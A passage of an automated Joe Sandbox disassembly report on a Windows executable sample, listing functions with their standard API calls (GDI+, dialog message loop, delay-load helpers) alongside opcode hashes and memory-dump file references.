                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExecutionStateThread
                                                                                              • String ID:
                                                                                              • API String ID: 2211380416-0
                                                                                              • Opcode ID: 014c5bf8d7029cdfbe27ac9e9cb09b7bfe145f2e330529d4c4e87cf4c916e17c
                                                                                              • Instruction ID: 730de0e4c3629d45d0d21c6d4d8cebfffe0f1c59a2a67c81a4f5bb9175081c69
                                                                                              • Opcode Fuzzy Hash: 014c5bf8d7029cdfbe27ac9e9cb09b7bfe145f2e330529d4c4e87cf4c916e17c
                                                                                              • Instruction Fuzzy Hash: D7D02B306010D517DF11372828757FF26068FC7324F0C0066F8855B283CF544C82B272
                                                                                              Function 00CBA626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GdipAlloc.GDIPLUS(00000010), ref: 00CBA62C
                                                                                                • Part of subcall function 00CBA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00CBA3DA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                              • String ID:
                                                                                              • API String ID: 1915507550-0
                                                                                              • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                              • Instruction ID: 9823f9a76a02dd93281216a88ea2d64a764b52b9537f2f54ae846c123885c8bf
                                                                                              • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                              • Instruction Fuzzy Hash: E1D0C9B1210209BADF466B628C129EE7A99EB00740F048125B882D6192EEB1DA10A666
                                                                                              Function 00CBE5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DloadProtectSection.DELAYIMP ref: 00CBE5E3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: DloadProtectSection
                                                                                              • String ID:
                                                                                              • API String ID: 2203082970-0
                                                                                              • Opcode ID: bd0edf8d08310498af9342e4283433ef3c26fcd50ff2f67e47a70c3c3f4b8c34
                                                                                              • Instruction ID: 265014ab908f6dca6f72a4b85c5ac1070d6f8820e29aa84d4598f24a869597c4
                                                                                              • Opcode Fuzzy Hash: bd0edf8d08310498af9342e4283433ef3c26fcd50ff2f67e47a70c3c3f4b8c34
                                                                                              • Instruction Fuzzy Hash: 7FD012B81C43409FE712EFA99846BD973D4B724F05F900101F15DD16D5DB64C5C5D629
                                                                                              Function 00CBDD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00CB1B3E), ref: 00CBDD92
                                                                                                • Part of subcall function 00CBB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CBB579
                                                                                                • Part of subcall function 00CBB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CBB58A
                                                                                                • Part of subcall function 00CBB568: IsDialogMessageW.USER32(0001046E,?), ref: 00CBB59E
                                                                                                • Part of subcall function 00CBB568: TranslateMessage.USER32(?), ref: 00CBB5AC
                                                                                                • Part of subcall function 00CBB568: DispatchMessageW.USER32(?), ref: 00CBB5B6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 897784432-0
                                                                                              • Opcode ID: 629479737427c671b84254e5b9446fc1d20303cf95ff3121b3f921e12b7b3ed6
                                                                                              • Instruction ID: 12b5eb7eff08003f2735a32d56aced9c7f575658b36ca922171bd21c93263e1b
                                                                                              • Opcode Fuzzy Hash: 629479737427c671b84254e5b9446fc1d20303cf95ff3121b3f921e12b7b3ed6
                                                                                              • Instruction Fuzzy Hash: E8D09E31144300BADA112B51DD06F4F7AA6AB88B04F004554B289740F186729D35EB12
                                                                                              Function 00CA98BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileType.KERNELBASE(000000FF,00CA97BE), ref: 00CA98C8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileType
                                                                                              • String ID:
                                                                                              • API String ID: 3081899298-0
                                                                                              • Opcode ID: cebf7c2ab6d668c0404fd674627ffad067f26433c6d91c5dc238aac5b697f57b
                                                                                              • Instruction ID: e0061b98b2a3dd43ffaf72d94aa74fb641a62122e6ec41cc26dad2d151fbc0d3
                                                                                              • Opcode Fuzzy Hash: cebf7c2ab6d668c0404fd674627ffad067f26433c6d91c5dc238aac5b697f57b
                                                                                              • Instruction Fuzzy Hash: 94C00238404246968E219B24988A1997722EE533AABB49695D079890E1C33ACE97EA11
                                                                                              Function 00CBE1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 90348273aacda28ba6a38588ffbc1028a344ad4e3d5137bf952dec210452f108
                                                                                              • Instruction ID: fe7e8c9b427df1b28e24c1f43f0e3609bec4ba6047491a66248ca1622f4542c0
                                                                                              • Opcode Fuzzy Hash: 90348273aacda28ba6a38588ffbc1028a344ad4e3d5137bf952dec210452f108
                                                                                              • Instruction Fuzzy Hash: 68B012E525C201BC3504114E2C42CFB010DC0C5F10730C43FFC05C05C1E840EC006472
                                                                                              Function 00CBE1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: e54f00ca4c6172e736d577b8c4cb8dd2d958d352951ae56db0239d273e7e17df
                                                                                              • Instruction ID: 51d113a6830c8ce763d4780165ac93a2d714d569c59bb190c98dec31d6078a4b
                                                                                              • Opcode Fuzzy Hash: e54f00ca4c6172e736d577b8c4cb8dd2d958d352951ae56db0239d273e7e17df
                                                                                              • Instruction Fuzzy Hash: 13B012E525C201AC3504514E2C42DFB014DC0C8F10730C03FF809C02C1E840AC006532
                                                                                              Function 00CBE1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: efd1de1b1202a61c70a18762708e2c4820896b20e64003cd24914242867076b5
                                                                                              • Instruction ID: 7ab3402aedabbc2ea2fa9245c16bd776c11028eb5dfa25057fd546917cf3d78b
                                                                                              • Opcode Fuzzy Hash: efd1de1b1202a61c70a18762708e2c4820896b20e64003cd24914242867076b5
                                                                                              • Instruction Fuzzy Hash: 6DB092A1258201AC2504520A2802DBA014DC085F10730C03AB809C02C1E840AC046472
                                                                                              Function 00CBE282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: ed4baedd68a5afb1a8c8ac7eaae62bd6fe0969279a67956e79ae35dc29a3814f
                                                                                              • Instruction ID: d4f675eeeaa327df9ebf077e12d75ccae46746ee5b3912faf4c5acfddca816fe
                                                                                              • Opcode Fuzzy Hash: ed4baedd68a5afb1a8c8ac7eaae62bd6fe0969279a67956e79ae35dc29a3814f
                                                                                              • Instruction Fuzzy Hash: 26B012F125C101AC3504510F2D02DFB01CDC0C4F10B30C03FF809C02C1EC41AD016432
                                                                                              Function 00CBE246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: fe3cebdca12894b6ee72982ea4fe4268f3a3847e6e983bf0c9b37fc4f80053b1
                                                                                              • Instruction ID: 4f64887353dc7eda4b0924be154f0a17439239bdf57bc9bebd371a9dd299a57b
                                                                                              • Opcode Fuzzy Hash: fe3cebdca12894b6ee72982ea4fe4268f3a3847e6e983bf0c9b37fc4f80053b1
                                                                                              • Instruction Fuzzy Hash: 3EB012E125D541AC3508910E2C02DFB014EC0C5F10B30C03FFC09C02C1E840EC006472
                                                                                              Function 00CBE250 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 4d165326352d3afedb407aa3075bbdc4751377b13ef937181b442d5ef69dac19
                                                                                              • Instruction ID: 6fdf30107f5f7a0ab7adbd60151e70604b03f817046244992d9388ecb2c4eabc
                                                                                              • Opcode Fuzzy Hash: 4d165326352d3afedb407aa3075bbdc4751377b13ef937181b442d5ef69dac19
                                                                                              • Instruction Fuzzy Hash: FCB012F125D641BC3548920E2C02DFB014EC0C4F10B30C13FF809C02C1E840AC446432
                                                                                              Function 00CBE26E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 19fa2761a52d180a0a7a11f64c372d44a7114d3befc08254fb19400903e11c44
                                                                                              • Instruction ID: 442f000cfad36dc76575557df7f4efce01fe59498a71b9c80a474985ce7f2ae8
                                                                                              • Opcode Fuzzy Hash: 19fa2761a52d180a0a7a11f64c372d44a7114d3befc08254fb19400903e11c44
                                                                                              • Instruction Fuzzy Hash: 66B012E125C101AC3504511E2C02DFF018DC0C5F10730C03FFD09C02C1E840EC006472
                                                                                              Function 00CBE264 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: a28190b67e0b7f4ef833cf474ff84e99ee27522285030feb39c2069288e7cb10
                                                                                              • Instruction ID: 75cce6212252205b38927806dc2d070335edd928cf523c67bee5a5c2c3add2dc
                                                                                              • Opcode Fuzzy Hash: a28190b67e0b7f4ef833cf474ff84e99ee27522285030feb39c2069288e7cb10
                                                                                              • Instruction Fuzzy Hash: 0CB012E126D541AC3508910E2C02DFB018EC4C8F10B30C03FF80AC02C1E840AC006432
                                                                                              Function 00CBE20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 2df22d4585f61ea0475a788664994510f319c6416fb5c56298a2e724da89cc8f
                                                                                              • Instruction ID: 17ec28fa73fb479abfc3204f2475adfe905fb9f7f975a2594d5ebf048d24b32e
                                                                                              • Opcode Fuzzy Hash: 2df22d4585f61ea0475a788664994510f319c6416fb5c56298a2e724da89cc8f
                                                                                              • Instruction Fuzzy Hash: 4DB092A1258201AC2504520A2902DBA014DC084F10730C03AB809C02C1E851AD496432
                                                                                              Function 00CBE200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: ffbceb8e7014c56ef454a853a53a301480b8f7a57bbabda8c2b51906b553055d
